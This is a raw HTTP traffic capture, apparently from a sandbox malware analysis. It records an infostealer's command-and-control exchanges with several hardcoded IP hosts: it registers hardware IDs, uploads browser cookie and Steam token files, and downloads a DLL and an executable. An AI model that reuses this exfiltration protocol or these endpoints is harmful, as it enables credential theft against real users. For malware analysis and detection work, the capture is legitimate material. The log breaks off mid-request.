Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGIJECFIEBFIDHCGHDHost: 185.215.113.17Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 2d 2d 0d 0a Data Ascii: ------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="message"files------KJDGIJECFIEBFIDHCGHD--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCBGDAAFBKEBGDHDBKEHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="file"------FHCBGDAAFBKEBGDHDBKE--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKFHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 2d 2d 0d 0a Data Ascii: ------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="message"ybncbhylepme------ECFCBFBGDBKJKECAAKKF--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECAHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EBGIEGCFHCFHIDHIJECA--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIIJDHCGCBKECBFIJKKHost: 91.202.233.158Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 35 38 33 35 42 36 46 32 35 37 34 35 32 35 33 37 30 33 36 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="hwid"75835B6F2574525370364------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="build"default------EGIIJDHCGCBKECBFIJKK--
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGHHost: 91.202.233.158Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 2d 2d 0d 0a Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="message"browsers------AFHIEBKKFHIEGCAKECGH--
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKKHost: 91.202.233.158Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 2d 2d 0d 0a Data Ascii: ------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="message"plugins------GDBKKFHIEGDHJKECAAKK--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJHost: 91.202.233.158Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="message"fplugins------HDAFIIDAKJDGDHIDAKJJ--
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAEHDBFIDAFIDHJEBFBHost: 91.202.233.158Content-Length: 6667Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000228001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/sqlite3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /inc/Amadeus.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGHHost: 91.202.233.158Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 67 33 4d 7a 67 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 67 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 33 4f 54 4d 34 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 33 4a 6a 55 30 6c 75 62 31 70 43 59 6a 5a 54 63 6e 63 77 55 47 52 51 54 55 35 6c 54 45 64 4c 63 32 56 6e 5a 6b 78 70 4c 58 52 52 62 6e 5a 70 61 47 38 31 61 45 74 4b 57 45 74 45 54 6d 63 77 61 31 68 4a 55 47 35 6d 56 47 4e 31 64 31 59 31 63 6a 64 53 63 57 70 55 4f 44 6b 7a 63 46 64 48 53 6b 59 33 61 32 78 4c 63 57 78 6b 51 6d 39 71 4e 48 4a 45 53 6e 5a 34 5a 6b 5a 73 5a 30 52 50 51 32 4e 58 4f 57 46 4c 52 47 35 56 4f 58 70 4a 62 46 56 6f 4d 6b 78 51 4d 48 5a 50 4f 47 73 7a 64 56 51 77 5a 30 68 4b 52 44 46 4b 64 6c 5a 42 59 32 78 72 53 6d 35 4c 64 31 70 48 4e 6d 68 45 51 57 77 32 4d 6b 68 79 54 58 68 4f 63 6c 56 6c 63 56 4e 53 4c 56 64 47 4d 55 6f 74 62 44 6c 5a 57 57 64 46 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 2d 2d 0d 0a Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZ
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGHJDBFIIDGDHIJDBGHost: 91.202.233.158Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; 